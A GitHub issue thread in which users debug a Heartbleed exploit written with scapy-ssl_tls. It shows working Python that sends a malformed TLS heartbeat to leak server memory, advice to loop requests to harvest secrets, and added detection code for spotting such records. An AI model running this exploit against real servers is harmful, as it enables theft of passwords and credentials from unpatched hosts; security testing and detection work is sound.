tintinweb / scapy-ssl_tls

SSL/TLS layers for scapy the interactive packet manipulation tool
GNU General Public License v2.0

Heartbleed Attack not working #134

Closed efak closed 6 years ago

efak commented 6 years ago

I am using the code below for heartbleed attack but I am not getting the expected results. Is there something that I am missing?

import scapy
from scapy.layers.ssl_tls import *
import socket

# Specify the hostname and port number
# (the posted line had an unbalanced parenthesis and did not parse)
target = ('www.myserver.com', 443)

# create tcp socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
#p = TLSRecord(version="TLS_1_0")/TLSHandshake()/TLSClientHello(version="TLS_1_0")

# create TLS Handshake / Client Hello packet
p = TLSRecord(version="TLS_1_0") / TLSHandshakes(handshakes=[TLSHandshake() /
                                                TLSClientHello(version="TLS_1_0", compression_methods=range(0xff)[::-1],
                                                               cipher_suites=range(0xff))])
s.sendall(str(p))
s.recv(8192)

# create TLS Heartbeat packet (declared length far larger than the data carried)
p = TLSRecord(version="TLS_1_0")/TLSHeartBeat(length=2**14-1, data='bleed...')
s.sendall(str(p))

resp = s.recv(2**14-1)
print "resp: %s" % repr(resp)
s.close()

tintinweb commented 6 years ago

Hi @efak,

I've actually tested the example from the README against a vulnerable server some time ago, so that should work. What unexpected result do you get? What openssl version are you using?

efak commented 6 years ago

The vulnerable server (ubuntu12.04) I set up is using openssl version below: OpenSSL 1.0.1 14 Mar 2012

I am however running scapy-ssl/tls on Ubuntu16.04 running openssl version below: OpenSSL 1.0.2g 1 Mar 2016

I expected that the heartbeat response would contain passwords in the memory of my vulnerable server.

tintinweb commented 6 years ago

I guess the script is working then. What type of information you find depends on your server process. The vulnerability allows you to retrieve part of the process memory and this might include passwords and other credentials or source-code for example.

efak commented 6 years ago

When I use python code here, I am able to retrieve all the expected secrets. I am wondering why my scapy-ssl/tls script does not.

tintinweb commented 6 years ago

@efak please verify that you received a heartbeat response and that it contains leaked bytes from the server. If that's the case then it is working, but you'll still need to loop heartbeat requests to extract more memory and potentially find secrets in the responses.

efak commented 6 years ago

I verified that I receive a heartbeat response with leaked bytes from the server but no secrets. I will loop the heartbeat requests and get back to you. Thank you

efak commented 6 years ago

The attack does not succeed even after looping. I put away my modified code and I am now using the exact sample heartbleed attack code in the README.md. Well, I changed "target.local" to my testing server that runs the vulnerable OpenSSL. I ran Wireshark on the server to examine the packets sent between the two machines. I do not see any TLS handshake packets and therefore I am assuming there is no TLS connection. My understanding was that there should be a TLS connection between client and server machines before a heartbeat packet can be sent. If that is correct, how did that code work for you but not for me? I have attached the Wireshark screenshot. [screenshot from 2018-07-02 01-54-32]
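For anyone looking at the same traffic in Wireshark, this is what the heartbeat record from the script looks like on the wire and how a monitor can flag it. This is an added example, not code from the thread or from the scapy-ssl_tls project: it parses raw TLS records with only the standard library, reports a heartbeat whose declared payload length exceeds what the record actually carries (the Heartbleed signature), and applies the response-larger-than-request check an IDS uses. The sample bytes are constructed here, modelled on the script's TLSHeartBeat(length=2**14-1, data='bleed...'), on the assumption that the library emits no padding.

```python
import struct

TLS_HEARTBEAT = 0x18            # TLS content type 24 (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16                # RFC 6520: at least 16 bytes of random padding

def parse_record(buf):
    """Split one TLS record into (content_type, version, payload)."""
    if len(buf) < 5:
        raise ValueError("truncated record header")
    ctype, version, length = struct.unpack("!BHH", buf[:5])
    payload = buf[5:5 + length]
    if len(payload) != length:
        raise ValueError("record length field exceeds bytes on the wire")
    return ctype, version, payload

def check_heartbeat(buf):
    """Verdict for one record: 'not-heartbeat', 'ok' or 'heartbleed'.

    Heartbeat body = 1 byte type, 2 byte payload_length, payload, padding.
    RFC 6520 requires the receiver to discard the message silently when
    payload_length does not fit in the record; vulnerable OpenSSL trusted it.
    """
    ctype, _, payload = parse_record(buf)
    if ctype != TLS_HEARTBEAT:
        return "not-heartbeat"
    if len(payload) < 3:
        return "heartbleed"     # no room even for the length field
    _, declared = struct.unpack("!BH", payload[:3])
    available = len(payload) - 3 - MIN_PADDING
    return "heartbleed" if declared > available else "ok"

def response_oversized(request_buf, response_buf):
    """IDS-style check: a reply carrying more bytes than the request it answers."""
    _, _, req = parse_record(request_buf)
    _, _, resp = parse_record(response_buf)
    return len(resp) > len(req)

def build_heartbeat(hb_type, declared_len, data, padding=b"\x00" * MIN_PADDING):
    """Helper to construct sample records (real padding would be random)."""
    body = struct.pack("!BH", hb_type, declared_len) + data + padding
    return struct.pack("!BHH", TLS_HEARTBEAT, 0x0301, len(body)) + body

# Constructed samples, not captured traffic. MALFORMED mirrors the script's
# TLSHeartBeat(length=2**14-1, data='bleed...') (assumed: no padding emitted).
MALFORMED = build_heartbeat(HB_REQUEST, 2**14 - 1, b"bleed...", padding=b"")
BENIGN = build_heartbeat(HB_REQUEST, 8, b"bleed...")
BENIGN_RESPONSE = build_heartbeat(HB_RESPONSE, 8, b"bleed...")
LEAKY_RESPONSE = build_heartbeat(HB_RESPONSE, 2**14 - 1, b"bleed..." + b"\x00" * (2**14 - 9))
```

Running check_heartbeat over every record in a capture shows whether a heartbeat was sent at all and whether its length field was consistent, which answers the handshake question above without guessing from the response payload.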

efak commented 6 years ago

Just to let you know that my code works now and I am able to do the heartbleed attack. Great tool! Keep the good work up!

userbox020 commented 5 years ago

bro, can you share your script. Mine doesn't work. I get this error

Traceback (most recent call last):
  File "ct3.py", line 9, in <module>
    s.connect(target)
  File "C:\Users\LEON\Miniconda2\lib\socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.gaierror: [Errno 11004] getaddrinfo failed

Can you help me bro?